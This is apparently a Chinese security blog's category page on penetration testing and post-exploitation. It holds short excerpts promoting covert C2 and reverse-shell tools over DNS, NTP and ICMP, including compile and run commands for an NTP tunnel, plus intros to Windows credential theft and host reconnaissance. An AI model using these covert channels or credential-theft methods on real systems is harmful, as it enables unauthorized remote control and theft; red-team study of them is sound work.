随笔分类 - 渗透测试 / 内网安全与后渗透
摘要:DNShell 一款基于DNS C2隧道的反弹shell工具。 支持 功能: 支持DNS-recordA-直连型 的C2隧道。 目标: Windows下基于Powershell的反弹。 Linux下基于ShellScript的反弹。 使用方法
阅读全文
摘要:NTPShell 获取地址:https://github.com/aplyc1a/NTPShell 通过NTP协议来负载C2数据。 编译 gcc ntp.c -lpthread -o ntp 使用 c2服务端:./ntp -S c2被控端:./ntp -C -s {server_addr}
阅读全文
摘要:p1ngp0ng 轻量级ICMP C2工具 依赖 Linux环境与GCC套件。 功能: p1ng: p1ng,实现C2服务器正向连接被控端。目前实现了对客户端的命令控制与文件上传下载。明文传输,未加密。 p0ng: p0ng,实现被控端反向连接C2服务器。目前实现了对客户端的命令控制与文件上传下载。
阅读全文
摘要:Windows 0x00 文件目录操作 1.查找文件 cmd: for /r 目录名 %变量名 in (匹配模式1,匹配模式2) do 命令 for /r d: %i in (*) do @echo %i for /r d: %i in (*.txt,*.jpg) do @echo %i for /
阅读全文
摘要:Windows 1 系统凭据 https://cloud.tencent.com/developer/article/1656546 下面这些工具对凭据的分析普遍需要管理员权限。一般来说,对于windows的凭据窃取类攻击流程是这么玩的: 拿到一台windows,尽可能的提到高权限,检查是否有域,有
阅读全文
摘要:基本信息收集 系统类型判断 使用whoami能快速判断系统是Linux还是Windows。 如果是Windows, 使用命令systeminfo | findstr OS可得到WIndows版本。 使用命令echo %PROCESSOR_ARCHITECTURE%可看出系统是基于什么架构的。 如果是
阅读全文